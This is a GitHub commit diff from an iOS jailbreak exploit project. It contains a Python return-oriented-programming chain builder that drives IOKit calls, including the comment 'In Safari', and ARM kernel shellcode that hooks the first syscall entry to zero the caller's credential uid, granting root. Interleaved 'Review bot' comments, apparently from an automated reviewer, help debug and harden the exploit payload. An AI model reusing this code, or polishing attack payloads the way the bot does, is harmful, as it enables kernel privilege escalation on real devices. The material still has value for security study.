starstuff

1 parent de3ea5f commit 04a0e61153292f98bd10b8cfe2f4e2bda68761e7 @comex committed May 2, 2011
Showing with 222 additions and 407 deletions.
  1. +3 −0 .gitmodules
  2. +25 −20 catalog/catalog.py
  3. +25 −15 catalog/kcode.S
  4. +1 −1 data
  5. +0 −65 datautils/apply_patchfile.c
  6. +0 −44 datautils/lambda.h
  7. +0 −193 datautils/make_kernel_patchfile.c
  8. +16 −14 install/install.m
  9. +53 −32 locutus/locutus.c
  10. +24 −4 locutus/locutus_server.m
  11. +38 −16 make.py
  12. +3 −2 nullfs/null.h
  13. +1 −1 nullfs/null_vfsops.c
  14. +14 −0 starstuff/lunchd
  15. +19 −0 starstuff/mtree
@@ -4,3 +4,6 @@
[submodule "datautils0"]
path = datautils0
url = git://github.com/comex/datautils0.git
+[submodule "white"]
+ path = white
+ url = git://github.com/comex/white.git
@@ -31,19 +31,26 @@ def add_lib(short, path):
dmini.cur.add_lib(short, path)
lib_paths.add(path)
+debugging = True
+
def dbg_result():
- if True:
+ if debugging:
result, resultp = stackunkpair()
store_r0_to(resultp)
back = sys._getframe().f_back
- funcall('_printf', ptr('Result for %s:%d was %%08x\n' % (back.f_code.co_filename, back.f_lineno), True), result)
+ if mode == 'two':
+ funcall('_fprintf', console, ptr('Result for %s:%d was %%08x\n' % (back.f_code.co_filename, back.f_lineno), True), result, load_r0=True)
+ else:
+ funcall('_syslog', 0, ptr('Result for %s:%d was %%08x' % (back.f_code.co_filename, back.f_lineno), True), result)
dmini.init(cachefile, True)
dmini.init(kernfile, False)
+sysent = dmini.cur.find_basic('- 00 10 86 00') + 4
+
code_addr = 0x80000400 # XXX
-weirdfile = dmini.Connection('kcode.o', rw=True).relocate(dmini.cur, code_addr).nth_segment(0)[:-4]
+weirdfile = dmini.Connection('kcode.o', rw=True).relocate(dmini.cur, code_addr).nth_segment(0)[:-8]
count = 0
stuff = ''
while True:
@@ -56,7 +63,7 @@ def dbg_result():
continue
stuff += I(addr, len(data)) + data
count += 1
-weirdfile = pointed(weirdfile + I(count) + stuff)
+weirdfile = pointed(weirdfile + I(sysent, count) + stuff)
def mov_r3_r7():
# push {r1, r3, r6, r7, lr}
@@ -102,15 +109,18 @@ def wrap(num):
init('R4', 'R5', 'PC')
make_r7_avail()
set_sp_to_sp()
-else:
- init('R8', 'R10', 'R11', 'R4', 'R5', 'R6', 'R7', 'PC')
-make_avail()
-
-if mode == 'dejavu':
+ make_avail()
load_r0_from(reloc(0xe, 0x558))
load_r0_r0()
zlocutusp, zlocutuspp = stackunkpair()
store_r0_to(zlocutuspp)
+else:
+ init('R8', 'R10', 'R11', 'R4', 'R5', 'R6', 'R7', 'PC')
+ make_avail()
+ if debugging:
+ console = ptrI(0)
+ funcall('_fopen', ptr('/dev/console', True), ptr('a', True))
+ store_r0_to(console)
funcall('_mach_task_self')
task_self, task_self_p = stackunkpair()
@@ -135,14 +145,16 @@ def wrap(num):
# XXX is this necessary? it's from star
funcall('iokit._IOKitWaitQuiet', 0, ptrI(0, 0, 0))
-#funcall('iokit._IOServiceMatching', ptr('AppleRGBOUT', True))
-funcall('iokit._IOServiceMatching', ptr('AppleCLCD', True))
+# XXX this won't work at boot because there is no notify!
+funcall('iokit._IOServiceMatching', ptr('AppleRGBOUT', True))
+#funcall('iokit._IOServiceMatching', ptr('AppleCLCD', True))
matching, matchingp = stackunkpair()
store_r0_to(matchingp)
funcall('iokit._IOServiceGetMatchingService', 0, matching)
connect = ptrI(0)
funcall('iokit._IOServiceOpen', None, task_self, 0, connect); dbg_result()
+# XXX In Safari, I need to kill this
funcall('iokit._IOConnectCallScalarMethod', connect, 21, ptrI(0xeeeeeeee, 0xeeeeeeee), 2, 0, 0, load_r0=True); dbg_result()
funcall('iokit._IOConnectCallStructMethod', connect, 5, ptr(transaction), len(transaction), 0, 0, load_r0=True); dbg_result()
@@ -167,21 +179,14 @@ def wrap(num):
fd, fdp = stackunkpair()
store_r0_to(fdp)
#dbg_result()
- funcall('_write', None, locutusp, reloc(0xb, 0))
+ funcall('_write', None, locutusp, reloc(0xa, 0))
dbg_result()
funcall('_close', fd)
dbg_result()
- funcall('_posix_spawn', 0x11000000, locutus_str, 0, 0, ptrI(locutus_str, 0), zerop)
+ funcall('_posix_spawn', 0, locutus_str, 0, 0, zerop, zerop)
dbg_result()
-# XXX vnode enforce
-
if mode == 'dejavu':
- funcall('_geteuid')
- funcall('_setuid', None); dbg_result()
-
- #funcall('_printf', ptr('done with shellcode\n', True))
-
set_r0_to(1337)
fancy_set_sp_to(reloc(0xe, 0x60c)) # offset determined by experiment
else:
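Review bot: The debug console handle set up in the new `else:` branch (`console = ptrI(0)`, then `_fopen('/dev/console', 'a')` and `store_r0_to(console)`) is stored without any NULL check, and `dbg_result` in mode 'two' hands it straight to `_fprintf`, so a failed open — plausible if this chain ever runs inside a sandboxed process, as the `XXX In Safari` comment suggests is a target — turns every `dbg_result()` into a crash before the payload runs. The chain has no conditional primitive, so the cheapest fix is to route the 'two' debug output through `_syslog` as the other modes already do, or at minimum record the assumption next to the fopen: `# debug only: assumes fopen('/dev/console') succeeds; a NULL here makes dbg_result fault in _fprintf`. In the last hunk `_posix_spawn` now receives `zerop` for argv, which leaves locutus with `argv[0] == NULL` if `zerop` is a single zero word (its definition is outside the hunk) — worth confirming locutus's `main()` tolerates that. This module-level flow begins before the first hunk and continues past the last.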
@@ -7,12 +7,12 @@ start:
adr r0, inspiring
bl _IOLog
- mov r8, #0; b end
+ #mov r8, #0; b end; foo
adr r5, stuff
ldr r8, count
-pf_loop:
+pf_loop:
ldm r5, {r0, r2}
add r1, r5, #8
bl _memcpy
@@ -38,26 +38,36 @@ end:
add r0, r6, #0x220
str r0, [r6, #0x220]
str r0, [r6, #0x224]
-#if 0
-
- ;# stop and start (94, 93)
- ldr r5, [r6]
- mov r0, r6
- ldr r1, [r6, #0x294]
- mov lr, pc
- ldr pc, [r5, #(94*4)]
-
- mov r0, r6
- ldr r1, [r6, #0x294]
- mov lr, pc
- ldr pc, [r5, #(93*4)]
+
+#ifdef DEJAVU
+ ldr r0, sysent
+ adr r1, syscall_0
+ str r1, [r0, #0x4]
#endif
pop {r8, r10, r11}
pop {r4-r7, pc}
+#ifdef DEJAVU
+syscall_0:
+ push {lr}
+ bl _proc_ucred
+ mov r1, #0
+ str r1, [r0, #0xc]
+ ldr r0, [r0, #0x6c]
+ cmp r0, #0
+ strne r1, [r0, #8]
+ ldr r0, sysent
+ ldr r1, [r0, #0xc4]
+ str r1, [r0, #0x4]
+ pop {pc}
+#endif
+
inspiring: .asciz "I exist!\n"
.align 2
+sysent: .long 0
count: .long 0
stuff:
+
+ #patch("sysent", 0, uint32_t, {find_int32(b_macho_segrange(binary, "__DATA"), 0x861000, true) + 4});
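Review bot: The new `syscall_0` handler elevates the caller by writing 0 into the credential returned by `_proc_ucred` in place (`str r1, [r0, #0xc]`, which at that offset looks like `cr_uid` — confirm against this kernel's `struct ucred`) instead of installing a fresh credential; XNU shares `kauth_cred` structures between processes whose credentials are identical, so if that sharing applies here the write would hand root to every process holding the same cred, not just the caller, and it bypasses the refcounting the cred machinery expects. The handler also returns with r0 still holding the `sysent` address, so the syscall reports a bogus nonzero status to its caller; add `mov r0, #0` before `pop {pc}`. Restoring `sysent[0]`'s handler from `[r0, #0xc4]` is unprotected against a second caller racing the first one, and the `0x6c` / `#8` offsets used to zero the label slot carry no explanation — a comment such as `@ cred+0x6c: presumed MAC label ptr, label+8: policy slot — layout unverified, confirm per kernel build` would help the next reader. The `end:` code that installs the hook starts outside the hunk.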
2 data
Submodule data updated 13 files
+8 −7 Makefile
+32 −17 Makefile.common
+33 −60 binary.c
+3 −2 binary.h
+71 −47 common.c
+2 −2 common.h
+0 −1 find.c
+0 −15 findtest.c
+21 −0 ldid_wrapper
+1 −18 link.c
+0 −2 link.h
+36 −48 running_kernel.c
+5 −1 running_kernel.h
@@ -1,65 +0,0 @@
-#include <data/common.h>
-#include <data/binary.h>
-#include <assert.h>
-
-int main(int argc, char **argv) {
- struct binary binary;
- b_init(&binary);
- mode_t mode;
- prange_t kernel = load_file(argv[1], true, &mode);
- b_prange_load_macho(&binary, kernel, argv[1]);
-
- int patchfd = open(argv[2], O_RDONLY);
- if(patchfd == -1) {
- edie("could not open patchfd");
- }
-
- while(1) {
- uint32_t name_len;
- ssize_t result = read(patchfd, &name_len, sizeof(name_len));
- if(result == 0) break;
- assert(result == sizeof(name_len));
- assert(name_len < 128);
- char *name = malloc(name_len + 1);
- assert(read(patchfd, name, name_len) == (ssize_t) name_len);
- name[name_len] = 0;
-
- addr_t addr;
- assert(read(patchfd, &addr, sizeof(addr)) == sizeof(addr));
-
- uint32_t size;
- assert(read(patchfd, &size, sizeof(size)) == sizeof(size));
- assert(size < 0x1000000);
-
- void *stuff = malloc(size);
- assert(read(patchfd, stuff, size) == (ssize_t) size);
-
- if(addr == 0) goto skip;
- if(name[0] == '+') goto skip;
-
- if(argv[4] && !strcmp(argv[4], "-i")) {
- retry:
- printf("%s [y/n] ", name);
- fflush(stdout);
- char buf[3];
- if(!fgets(buf, sizeof(buf), stdin)) abort();
- if(!strcmp(buf, "n\n")) {
- goto skip;
- } else if(strcmp(buf, "y\n")) {
- goto retry;
- }
- } else {
- printf("%s\n", name);
- }
-
- memcpy((char *) kernel.start + range_to_off_range((range_t) {&binary, addr, size}).start, stuff, size);
-
- skip:
-
- free(name);
- free(stuff);
- }
-
- store_file(kernel, argv[3], mode);
- return 0;
-}
@@ -1,44 +0,0 @@
-#pragma once
-
-/* Example:
-
- int multiplier = 5;
- DECL_LAMBDA(l, int, (int a), {
- return a * multiplier;
- })
- assert(l.func(l.arg, 4) == 20);
-
- The point of this is to work on both iOS, where GCC inline
- functions don't work, and Linux, where Apple blocks generally
- aren't available.
-*/
-
-#ifdef __BLOCKS__
-struct _blk {
- void *isa;
- int flags;
- int reserved;
- void *invoke;
-};
-#define LAMBDA_BODY(typ, ret, args, body) \
- ({ union { \
- ret (^blk) args; \
- struct _blk *_blk; \
- void *vp; \
- } u = { ^ret args body }; \
- (typ) {u._blk->invoke, u.vp}; \
- })
-#else
-#define LAMBDA_BODY_(typ, ret, args, body) \
- ({ ret func args body; \
- (typ) {&func, 0}; \
- })
-#define LAMBDA_BODY(typ, ret, args, body) \
- LAMBDA_BODY_(typ, ret, LAMBDA_UNPAREN args, body)
-#endif
-#define LAMBDA_UNPAREN(args...) (void *_lambda_ignored, ##args)
-#define DECL_LAMBDA(name, ret, args, body) \
- struct { \
- ret (*func) LAMBDA_UNPAREN args; \
- void *arg; \
- } name = LAMBDA_BODY(typeof(name), ret, args, body);